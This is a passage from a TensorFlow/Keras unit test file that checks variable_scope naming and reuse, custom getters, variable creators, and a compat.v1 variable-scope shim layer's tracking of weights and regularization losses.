@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuse(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True) as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetVar(self):
with self.cached_session():
with tf.compat.v1.variable_scope("root"):
with tf.compat.v1.variable_scope("towerA") as tower_a:
va = tf.compat.v1.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with tf.compat.v1.variable_scope(tower_a, reuse=True):
va2 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va2, va)
with tf.compat.v1.variable_scope("towerB"):
vb = tf.compat.v1.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with tf.compat.v1.variable_scope("towerA", reuse=True):
va2 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va2, va)
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with tf.compat.v1.variable_scope(tower_a, reuse=True):
va3 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va, va3)
with self.assertRaises(ValueError) as exc:
with tf.compat.v1.variable_scope(tower_a, reuse=True):
tf.compat.v1.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with tf.compat.v1.variable_scope(tower_a, reuse=True):
tf.compat.v1.get_variable("v", [1], dtype=tf.int32)
self.assertEqual("dtype" in str(exc.exception), True)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
pass
with tf.compat.v1.variable_scope(outer):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestedOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope(outer):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseParam(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer) as outer:
with tf.compat.v1.variable_scope("tower", "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
outer.reuse_variables()
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseError(self):
with self.cached_session():
with self.assertRaises(ValueError):
with tf.compat.v1.variable_scope(None, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
pass
with tf.compat.v1.variable_scope(outer, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
outer.reuse_variables()
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeNestedOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope(outer, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with tf.compat.v1.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "scope/w:0")
with tf.compat.v1.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name, "scope/w1:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name, "outer/inner/w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with tf.compat.v1.variable_scope(
None, default_name="default", auxiliary_name_scope=False):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/w:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
None, default_name="default",
auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
root_scope = tf.compat.v1.get_variable_scope()
with tf.compat.v1.variable_scope(
root_scope, auxiliary_name_scope=False):
self.assertEqual(tf.compat.v1.get_variable("w", []).name, "w:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(tf.compat.v1.get_variable("w1", []).name, "w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAuxiliaryNameScopeIsInvalid(self):
with self.cached_session():
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with tf.compat.v1.variable_scope("scope") as scope:
pass
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReuseScopeWithoutNameScopeCollision(self):
# Github issue: #13429
with self.cached_session():
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope("inner") as inner:
pass
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with tf.name_scope(scope.original_name_scope):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")
with tf.compat.v1.variable_scope("another"):
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with tf.name_scope(scope1.original_name_scope):
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name,
"outer/inner/w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVarWithDevice(self):
g = tf.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with tf.compat.v1.device(device_func):
_ = tf.compat.v1.get_variable("x", (100, 200))
_ = tf.compat.v1.get_variable(
"y", dtype=tf.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", tf.float32))
self.assertEqual(varname_type[1], ("y", tf.int64))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithRefDtype(self):
v = tf.compat.v1.get_variable("v", shape=[3, 4], dtype=tf.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = tf.compat.v1.get_variable("w", shape=[5, 6], dtype=v.dtype)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesNoArgs(self):
v = tf.compat.v1.get_variable("foo", initializer=lambda: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesOptionalArgs(self):
v = tf.compat.v1.get_variable("foo", initializer=lambda x=True: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoGraphs(self):
def f():
g1 = tf.Graph()
g2 = tf.Graph()
with g1.as_default():
with g2.as_default():
with tf.compat.v1.variable_scope("_"):
pass
self.assertRaisesRegex(ValueError, "'_' is not a valid scope name", f)
class VariableScopeWithCustomGetterTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNonCallableGetterFails(self):
with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
with tf.compat.v1.variable_scope("scope0", custom_getter=3):
tf.compat.v1.get_variable("name0")
with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
tf.compat.v1.get_variable("name0", custom_getter=3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with tf.compat.v1.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope(scope, reuse=True):
v2 = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("new_scope") as new_scope:
v3 = tf.compat.v1.get_variable("v3", [1])
with tf.compat.v1.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = tf.compat.v1.get_variable("v3", [1])
self.assertIs(v, v2)
self.assertIs(v3, v4)
self.assertEqual(3, called[0]) # skipped one in the first new_scope
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSynchronizationAndAggregationWithCustomGetter(self):
called = [0]
synchronization = tf.VariableSynchronization.AUTO
aggregation = tf.compat.v1.VariableAggregation.NONE
def custom_getter(getter, *args, **kwargs):
called[0] += 1
# Verify synchronization and aggregation kwargs are as expected.
self.assertEqual(kwargs["synchronization"], synchronization)
self.assertEqual(kwargs["aggregation"], aggregation)
return getter(*args, **kwargs)
with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
tf.compat.v1.get_variable("v", [1])
self.assertEqual(1, called[0])
with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
synchronization = tf.VariableSynchronization.ON_READ
aggregation = tf.compat.v1.VariableAggregation.MEAN
tf.compat.v1.get_variable(
"v1", [1], synchronization=synchronization, aggregation=aggregation)
self.assertEqual(2, called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreator(self):
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with tf.variable_creator_scope(creator_a):
with tf.variable_creator_scope(creator_b):
tf.compat.v1.Variable(1.0, name="one_name")
self.assertEqual(variable_names[0], "forced_name")
called = [False]
def creater_c(next_creator, **kwargs):
called[0] = True
self.assertEqual(kwargs["synchronization"],
tf.VariableSynchronization.ON_WRITE)
self.assertEqual(kwargs["aggregation"],
tf.compat.v1.VariableAggregation.MEAN)
return next_creator(**kwargs)
with tf.variable_creator_scope(creater_c):
tf.compat.v1.get_variable(
"v", [],
synchronization=tf.VariableSynchronization.ON_WRITE,
aggregation=tf.compat.v1.VariableAggregation.MEAN)
self.assertTrue(called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreatorNestingError(self):
def creator(next_creator, **kwargs):
return next_creator(**kwargs)
# Save the state so we can clean up at the end.
graph = tf.compat.v1.get_default_graph()
old_creator_stack = graph._variable_creator_stack
try:
scope = tf.variable_creator_scope(creator)
scope.__enter__()
with tf.variable_creator_scope(creator):
with self.assertRaises(RuntimeError):
scope.__exit__(None, None, None)
finally:
graph._variable_creator_stack = old_creator_stack
class VariableScopeMultithreadedTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with tf.compat.v1.variable_scope(main_thread_scope):
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual("bar/v:0", v.name)
graph = tf.compat.v1.get_default_graph()
with tf.compat.v1.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()
class CompatV1TemplateScaleByY(variable_scope_shim.VariableScopeLayer):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def my_op(x, scalar_name):
var1 = tf.compat.v1.get_variable(
scalar_name,
shape=[],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.constant_initializer(1.5))
return x * var1
self.scale_by_y = tf.compat.v1.make_template(
"scale_by_y", my_op, scalar_name="y")
def forward_pass(self, inputs):
with tf.compat.v1.variable_scope("foo"):
return self.scale_by_y(inputs)
class VariableScopeModule(tf.Module):
"""Module that uses the shim."""
@variable_scope_shim.track_tf1_style_variables
def __call__(self, *args, **kwargs):
with self.name_scope:
return self.forward_pass(*args, **kwargs)
def get_compat_v1_regularization_losses(self):
"""Dict w/ regularization losses from `get_variable`&`compat.v1.layers`."""
return {name: regularizer() for name, regularizer
in self._tf1_style_var_store._regularizers.items()} # pylint: disable=protected-access
@combinations.generate(combinations.combine(mode=["eager"]))
class TF1VariableScopeLayerTest(tf.test.TestCase, parameterized.TestCase):
def test_get_variable(self):
# Test the shim when using `get_variable` (and regularizers) directly
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = inputs
with tf.compat.v1.variable_scope("dense_one"):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
with tf.compat.v1.variable_scope("nested_scope"):
with tf.compat.v1.variable_scope("dense_two"):
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, regularization losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(layer.losses), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(layer.losses), 6)
def test_compat_v1_layer(self):
# Test the shim when using `compat.v1` layers
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs, self.units, name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out, self.units, name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(layer.losses), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(layer.losses), 6)
def test_shim_exporting(self):
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs,
self.units,
name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out,
self.units,
name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
layer(tf.ones(shape=(5, 5)))
tmp_dir = self.get_temp_dir()
tf.saved_model.save(layer, tmp_dir)
def test_module_get_variable(self):
# Test the module shim when using `get_variable` (and regularizers) directly
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = inputs
with tf.compat.v1.variable_scope("dense_one"):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
with tf.compat.v1.variable_scope("nested_scope"):
with tf.compat.v1.variable_scope("dense_two"):
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, regularization losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 6)
def test_module_compat_v1_layer(self):
# Test the module shim when using `compat.v1` layers
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs, self.units, name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out, self.units, name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(
layer.get_compat_v1_regularization_losses().values()), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(
layer.get_compat_v1_regularization_losses().values()), 6)
def test_shim_nesting(self):
# Test that nesting the shim in itself works
class NestedLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, name, *args, **kwargs):
super().__init__(*args, name=name, **kwargs)
self.units = units
def forward_pass(self, inputs):
out = inputs
with tf.compat.v1.variable_scope(self.name):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(1.0),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.initializers.zeros,
name="bias")
out = tf.linalg.matmul(out, kernel)
out = tf.compat.v1.nn.bias_add(out, bias)
return out
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self.dense_layer_a = None
self.dense_layer_b = None
def forward_pass(self, inputs):
# Only create the nested tf.variable/module/layer/model if it has not
# already been created!
if not self.dense_layer_a:
self.dense_layer_a = NestedLayer(self.units * 2, "dense_one")
out = self.dense_layer_a(inputs)
if not self.dense_layer_b:
self.dense_layer_b = NestedLayer(self.units, "dense_two")
out = self.dense_layer_b(out)
return out
layer = WrappedDenseLayer(5)
out = layer(tf.ones(shape=(1, 3)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
# (Specifically: no double-counting of any weights or reg. losses
# between nested components!)
self.assertEqual({var.name for var in layer.trainable_weights},
{"dense_one/bias:0",
"dense_one/kernel:0",
"dense_two/bias:0",
"dense_two/kernel:0"})
self.assertEqual({var.name for var in layer.dense_layer_a.weights},
{"dense_one/bias:0",
"dense_one/kernel:0"})
self.assertEqual({var.name for var in layer.dense_layer_b.weights},
{"dense_two/bias:0",
"dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 30)
self.assertAllEqual(tf.add_n(layer.dense_layer_a.losses), 30)
self.assertAllEqual(tf.add_n(layer.dense_layer_b.losses), 50)
self.assertAllEqual(tf.add_n(layer.losses), 80)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(3, 10)) * 2)
weights["dense_two/kernel:0"].assign(
tf.ones(shape=(10, 5)) * 2)
out = layer(tf.ones(shape=(1, 3)))
self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 120)
self.assertAllEqual(tf.add_n(layer.losses), 320)
def test_compat_v1_make_template_in_shim_eager(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly in eager
layer = CompatV1TemplateScaleByY()
for _ in range(3):
# Use multiple calls to verify that no new weights get created
self.assertAllEqual(layer(tf.ones(shape=(2, 3))),
tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual({var.name: var for var in layer.weights},
{"foo/scale_by_y/y:0": 1.5})
self.assertAllEqual(tf.add_n(layer.losses),
regularizers.L2()(layer.weights[0]))
def test_compat_v1_make_template_in_shim_tf_function(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly in a tf.function
# when made outside the function
layer = CompatV1TemplateScaleByY()
@tf.function
def foo(x):
return layer(x), tf.add_n(layer.losses)
for _ in range(3):
# Use multiple calls to verify that no new weights get created
out, loss = foo(tf.ones(shape=(2, 3)))
self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual(loss, regularizers.L2()(layer.weights[0]))
self.assertAllEqual({var.name: var for var in layer.weights},
{"foo/scale_by_y/y:0": 1.5})
def test_compat_v1_make_template_in_trace_in_shim(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly when the make_template/layer/shim
# is created on the first tf.function trace!
layers = {}
@tf.function
def bar(x):
if "layer" not in layers:
layers["layer"] = CompatV1TemplateScaleByY()
layer = layers["layer"]
return layer(x), tf.add_n(layer.losses)
for _ in range(3):
# Use multiple calls to verify that no new weights get created
out, loss = bar(tf.ones(shape=(2, 3)))
self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual(loss, regularizers.L2()(layers["layer"].weights[0]))
self.assertAllEqual({var.name: var for var in layers["layer"].weights},
{"foo/scale_by_y/y:0": 1.5})
def test_only_track_get_variable(self):
# Test the shim does not try tracking or reusing variables
# that were not created by get_variable. These variables/modules/layers
# need to be tracked separately
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return dense_layer(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
self.assertEmpty(layer.weights)
def test_embedded_keras_model(self):
# Test the shim when embedding a Keras model inside of it
# And assigning the model to an attribute
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
if not self._dense_model:
inp = input_layer_module.Input(shape=inputs.shape)
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
self._dense_model = training_module.Model(
inputs=inp, outputs=dense_layer(inp))
return self._dense_model(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense/bias:0",
"dense/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
self.assertAllEqual(tf.add_n(layer.losses), 0.5)
# Verify reuse by updating the variables then re-running
weights["dense/kernel:0"].assign(
tf.ones(shape=(5, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
self.assertAllEqual(tf.add_n(layer.losses), 2)
